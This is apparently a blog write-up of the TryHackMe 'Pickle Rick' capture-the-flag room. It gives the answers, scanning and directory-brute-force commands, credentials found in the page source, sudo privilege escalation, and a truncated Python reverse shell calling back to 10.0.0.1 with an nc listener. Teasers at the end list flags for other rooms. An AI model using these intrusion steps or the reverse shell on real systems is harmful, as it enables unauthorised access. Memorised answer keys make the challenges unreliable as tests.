Pickle Rick - TryHackMe Problem Solving

 

Pickle Rick

 A Rick and Morty CTF. Help turn Rick back into a human!

 

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Deploy the virtual machine on this task and explore the web application: MACHINE_IP 

You can also access the web app using the following link: https://LAB_WEB_URL.p.thmlabs.com (this will update when the machine has fully started) 

 Answer the questions below

 1. What is the first ingredient Rick needs?

Ans: mr. meeseek hair

 2. Whats the second ingredient Rick needs?

Ans: 1 jerry tear

3. Whats the final ingredient Rick needs?

Ans: fleeb juice

How to solve this problem?

1. First of all, we will open "openvpn."

cmd: sudo openvpn "openvpn file.ovpn"

2. We will do a scan with Nmap.

cmd: nmap IP address

cmd: nikto -h http://ip | tee nikto.log

3. We will find php, sh, html, css, js, py, c, and other files with gobuster.

cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,css,js,html,py,cgi,txt,sh 

4. Open your browser, enter your IP address, and select View Source to obtain the username = R1ckRul3s

5. Browsers to IP/robots.txt with "get password" =  Wubbalubbadubdub

6. Browsers navigate to IP/login.php and enter their username and password.

7.  We'll have to look at the command panel. 

command panel: ls

command panel: less Sup3rS3cretPickl3lngred.txt

Get first ingredient

command panel:  while read line; do echo $line; done < clue.txt

command panel: grep -R .

8. Check out the source code.

9. Examine the source code at the bottom of the page and "get comments out of the texts."

10. We'll write " | base64 -d " 7 to 10 times until we see the decoded text.

cmd: echo "decode text" | base64 -d

cmd: echo "decode text" | base64 -d | base64 -d

 command panel: python3 -c "print('hello')"

command panel: less /home/rick/"second ingredients"; ls 

Get second ingredient

command panel: sudo -l 

command panel: sudo ls /root

command panel: sudo less /root/3rd.txt

Get final ingredient

OR

11. Browsers to search "pentestmonkey reverse shell" and get

Python:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234)

New cmd: ip addr show tun0

cmd: nc -lnvp "set port number"

command panel:  "python3 texts change PC IP address and past"

 cmd: sudo bash

cmd: cd

cmd: ls

cmd: cat 3rd.txt

cmd: cd /home

cmd: ls

cmd: cd rick

cmd: ls

cmd: cat *


Comments

Post a Comment

Popular posts from this blog

Startup - TryHackMe Problem Solving

Startup Abuse traditional vulnerabilities via untraditional means. 🎂      🍔     🍕    🍗   Task 1 Welcome to Spice Hut!  We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!😐 Answer the questions below -------------------------------------------------------------- 1. What is the secret spicy soup recipe? 💓 Answer: love 2.  What are the contents of user.txt?  Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79} 3. What are the contents of root.txt? Answer: THM{f963aaa6a430f210222158ae15c3d76d}   Task 2 Credits   Spice Hut was very happy with y...
Read more

Tomghost - TryHackMe Problem Solving

Image
  tomghost Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.    Task 1 Flags 🐈 👽 👻 👿 💀 GHOST CAT   Are you able to complete the challenge? The machine may take up to 5 minutes to boot and configure.   Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark   Answer the questions below ------------------------------------------------------------------ 1. Compromise this machine and obtain user.txt Answer: THM{GhostCat_1s_so_cr4sy} 2. Escalate privileges and obtain root.txt Answer: THM{Z1P_1S_FAKE} How are we going to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn"  2. After joining the room, we can deploy the machine. 3. We will do a scan with Nmap. cmd: sudo  nmap -A -T4 IP Adderss 4. Go to your bro...
Read more